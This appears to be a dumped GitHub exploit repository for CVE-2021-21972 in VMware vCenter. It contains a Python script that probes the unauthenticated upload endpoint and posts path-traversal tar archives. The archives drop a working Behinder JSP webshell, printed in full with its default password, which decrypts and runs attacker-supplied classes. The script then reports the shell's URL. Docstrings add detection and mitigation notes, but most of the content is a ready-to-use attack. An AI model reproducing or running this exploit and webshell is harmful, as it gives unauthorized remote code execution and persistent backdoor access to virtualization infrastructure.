├── README.md ├── exp ├── Linux.tar └── Windows.tar ├── vcenter_rce.jpg └── vcenter_rce.py /README.md: -------------------------------------------------------------------------------- 1 | # vcenter_rce 2 | 漏洞利用,Vmware vCenter 6.5-7.0 RCE(CVE-2021-21972),上传冰蝎3,getshell 3 | 4 | #Usage: python3 vcenter_rce -u url 5 | ![image](https://github.com/gsheller/vcenter_rce/blob/master/vcenter_rce.jpg) 6 | -------------------------------------------------------------------------------- /exp/Linux.tar: -------------------------------------------------------------------------------- 1 | ../../usr/lib/vmware-vsphere-ui/server/work/deployer/s/global/42/0/h5ngc.war/resources/0000755000000000000000000000000014015431210027145 5ustar rootroot../../usr/lib/vmware-vsphere-ui/server/work/deployer/s/global/42/0/h5ngc.war/resources/shell.jsp0000644000000000000000000000117114015430711030777 0ustar rootroot<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";/*该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond*/session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}/*1kdnwbry2LyI7pyA*/%> 2 | -------------------------------------------------------------------------------- /exp/Windows.tar: -------------------------------------------------------------------------------- 1 | ././@LongLink0000000000000000000000000000016200000000000011564 Lustar 
rootroot../../ProgramData/VMware/vCenterServer/runtime/vsphere-ui/server/work/deployer/s/global/40/0/h5ngc.war/resources/../../ProgramData/VMware/vCenterServer/runtime/vsphere-ui/server/work/deployer/s/global/40/0/h5ngc.w0000755000000000000000000000000014015472111031540 5ustar rootroot././@LongLink0000000000000000000000000000017300000000000011566 Lustar rootroot../../ProgramData/VMware/vCenterServer/runtime/vsphere-ui/server/work/deployer/s/global/40/0/h5ngc.war/resources/shell.jsp../../ProgramData/VMware/vCenterServer/runtime/vsphere-ui/server/work/deployer/s/global/40/0/h5ngc.w0000644000000000000000000000117114015471465031555 0ustar rootroot<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";/*该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond*/session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}/*1kdnwbry2LyI7pyA*/%> 2 | -------------------------------------------------------------------------------- /vcenter_rce.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ma1Dong/vcenter_rce/4bb3f4607fe56234aecb15df1c8fd482480eebf5/vcenter_rce.jpg -------------------------------------------------------------------------------- /vcenter_rce.py: -------------------------------------------------------------------------------- 1 | #! 
#! /usr/bin/env python
# -*- coding:utf-8 -*-
#Author:gshell
"""Proof-of-concept for CVE-2021-21972 (VMware vCenter, file upload via the vROps plugin endpoint).

What the code below does, step by step:
  1. ``checkVul``        -- GET ``/ui/vropspluginui/rest/services/uploadova`` without any credentials
                            and treats an HTTP 405 (method not allowed) as "the handler is present".
  2. ``gshell``          -- POST ``exp/Linux.tar`` as multipart field ``uploadFile``. The archive members
                            (see the tar residue in this repo) carry ``../`` path components so the
                            contained ``shell.jsp`` is written under the vsphere-ui deployer's
                            ``h5ngc.war/resources`` directory; on failure ``uploadWindowsPayload``
                            retries with ``exp/Windows.tar`` for the Windows install layout.
  3. ``checkShellExist`` -- GET ``/ui/resources/shell.jsp``; any non-404 is reported as a deployed
                            Behinder (冰蝎) JSP webshell using its default connection password.

Defensive notes:
  * Detection: a GET probe of the uploadova path, then a multipart POST to it, then a GET of
    ``/ui/resources/shell.jsp`` from the same client is the complete network signature of this tool.
    An unexpected ``.jsp`` under the ``h5ngc.war/resources`` directory of the vsphere-ui work tree is
    the on-host artifact to hunt for.
  * Mitigation: apply the vendor fix for CVE-2021-21972. Every request is sent with ``verify=False``,
    so certificate errors do not stop this traffic.
"""

import sys
import requests
import os
import urllib3

# NOTE(review): the banner's original column alignment was lost in the paste; only the text survives.
auth = """
___ _____ __ __ __
/ _ ) __ __ / ___/ ___ / / ___ / / / /
/ _ | / // / / (_ / (_-< / _ \/ -_) / / / /
/____/ \_, / \___/ /___//_//_/\__/ /_/ /_/
/___/
====================================================
"""

# Module-level side effect: silences urllib3's InsecureRequestWarning, because every
# request below disables TLS certificate validation (verify=False).
urllib3.disable_warnings()

# Payload archives are resolved against the *current working directory*, not the script's location.
WORK_PATH = os.getcwd()

linux_exp = WORK_PATH + '/exp/Linux.tar'
win_exp = WORK_PATH + '/exp/Windows.tar'
# init vulnerable url and shell URL
# vul_url:   the vROps plugin upload handler targeted by CVE-2021-21972
# shell_url: where the dropped JSP is expected to be served from afterwards
vul_url = '/ui/vropspluginui/rest/services/uploadova'
shell_url = '/ui/resources/shell.jsp'

# Browser-like User-Agent. For detection purposes the UA is not distinctive; the request
# path sequence described in the module docstring is.
headers={}
headers['User-Agent']='Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0'


def checkVul(url):
    """Probe whether the vulnerable upload endpoint is exposed.

    Removes one trailing ``/`` and anything after the first newline from *url*, then issues an
    unauthenticated GET to ``url + vul_url``. An HTTP 405 is taken as evidence that the handler
    exists (it is expected to accept only POST). Any other status, or any exception at all
    (the bare ``except`` swallows connection errors, timeouts and everything else), is reported
    on stdout and yields False.

    Args:
        url: Base URL of the target, e.g. ``https://host``. Assumed non-empty.

    Returns:
        True when the GET answered 405, otherwise False.
    """
    if url[-1] == '/':
        url = url[:-1].split('\n')[0]
    else:
        url = url.split('\n')[0]
    try:
        res = requests.get(url+vul_url, verify=False,timeout=5,headers=headers)
        if res.status_code == 405:
            print('[+] 目标可能存在漏洞:{}'.format(url))
            return True
        else:
            print('[-] {url} 目标不存在漏洞'.format(url=url))
            return False
    except:
        print('[-] {url} 目标连接失败'.format(url=url))
        return False



def checkShellExist(url):
    """Return True when ``url + shell_url`` answers with any status other than 404.

    Any non-404 counts (403, 500, a WAF block page, ...), so a True result does not prove the
    uploaded JSP is actually executing. Exceptions from ``requests`` propagate to the caller.
    """
    res = requests.get(url + shell_url, verify=False,timeout=5,headers=headers)
    # print(res.status_code)
    if res.status_code != 404:
        return True
    else:
        return False

def uploadWindowsPayload(url):
    """Second attempt: upload ``exp/Windows.tar`` (Windows vCenter path layout) to the upload endpoint.

    Same flow as ``gshell``: the archive is posted as multipart field ``uploadFile``, a response body
    containing ``SUCCESS`` is treated as accepted, and ``checkShellExist`` is then used to confirm the
    JSP is reachable at ``shell_url``.

    Args:
        url: Base URL of the target; normalised the same way as in ``checkVul``.
    """
    if url[-1] == '/':
        url = url[:-1].split('\n')[0]
    else:
        url = url.split('\n')[0]

    print('[+] 测试win_exp')
    file = {'uploadFile': open(win_exp, 'rb')}
    re = requests.post(url + vul_url, files=file, verify=False,timeout=5,headers=headers)
    if 'SUCCESS' in re.text:
        if checkShellExist(url):
            print('[+] shell地址:: {url}, 冰蝎3,密码:rebeyond'.format(url=url + shell_url))
    # NOTE(review): the indentation of this `else` was lost in the paste; it is reconstructed as
    # pairing with the outer `if 'SUCCESS' in re.text`, but it may have paired with the inner `if`.
    else:
        print(
            '[-] All payload has been upload but not success.'
        )

def gshell(url):
    """Upload the Linux payload and report the webshell location; fall back to the Windows payload.

    Posts ``exp/Linux.tar`` as multipart field ``uploadFile`` to ``url + vul_url``. If the response body
    contains ``SUCCESS`` and ``checkShellExist`` finds the JSP, the shell URL is printed; in every other
    case ``uploadWindowsPayload`` is tried next.

    Args:
        url: Base URL of the target; normalised the same way as in ``checkVul``.
    """
    if url[-1] == '/':
        url = url[:-1].split('\n')[0]
    else:
        url = url.split('\n')[0]

    print('[+] 测试linux_exp')
    file = {'uploadFile': open(linux_exp, 'rb')}
    # print(url + vul_url)
    res = requests.post(url + vul_url, files=file, verify=False,timeout=5,headers=headers)
    # print (res.text)
    if 'SUCCESS' in res.text:
        print('[+] shell成功上传')
        if checkShellExist(url):
            print(
                '[+] shell地址: {url}, 冰蝎3,密码:rebeyond'.format(
                    url=url + shell_url))
        else:
            uploadWindowsPayload(url)
    else:
        uploadWindowsPayload(url)

if __name__ == "__main__":
    print(auth)

    # Hand-rolled argument handling: the value following "-u" is the target base URL.
    # sys.argv.index("-u") raises ValueError when the flag is absent.
    if len(sys.argv) < 2:
        print("usage:python vcenter_rce.py -u website")
    else:
        url = sys.argv[sys.argv.index("-u")+1]
        # jar = sys.argv[sys.argv.index("-u")+3]
        if checkVul(url):
            gshell(url)
            # CVE_2020_17519(url)
            # rce(url)


# Dead alternative argparse-based entry point, kept commented out as in the original;
# it references banner()/getshell(), which are not defined in this file.
# if __name__ == "__main__":
#     banner()
#     parser = argparse.ArgumentParser()
#     parser.add_argument(
#         "-url",
#         "--targeturl",
#         type=str,
#         help="Target URL. e.g: -url 192.168.2.1、-url https://192.168.2.1")
#     args = parser.parse_args()
#     url = args.targeturl
#     if 'https://' not in url:
#         url = 'https://' + url
#     if checkVul(url):
#         getshell(url)
#     elif checkVul(url):
#         getshell(url)
#     else:
#         parser.print_help()